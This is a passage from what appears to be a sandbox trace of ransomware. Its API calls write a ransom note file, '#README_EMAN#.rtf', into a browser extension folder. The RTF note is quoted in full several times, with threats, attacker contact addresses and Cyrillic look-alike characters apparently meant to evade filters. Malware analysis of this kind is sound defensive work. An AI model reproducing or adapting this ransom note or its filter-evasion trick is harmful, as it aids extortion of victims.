w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2476938, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nSë\x91W[d¼\"òÈF\x17þê\x89|ó¢kö\x97pcÓ\x08", lpUsedDefaultChar=0x0) returned 8717 [0285.130] WriteFile (in: hFile=0x294, lpBuffer=0x2476938*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2476938*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0285.131] CloseHandle (hObject=0x294) returned 1 [0285.131] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\#readme_eman#.rtf")) returned 0xffffffff [0285.131] GetLastError () returned 0x2 [0285.131] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_GB\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_1\\_locales\\en_gb\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0285.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0285.132] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 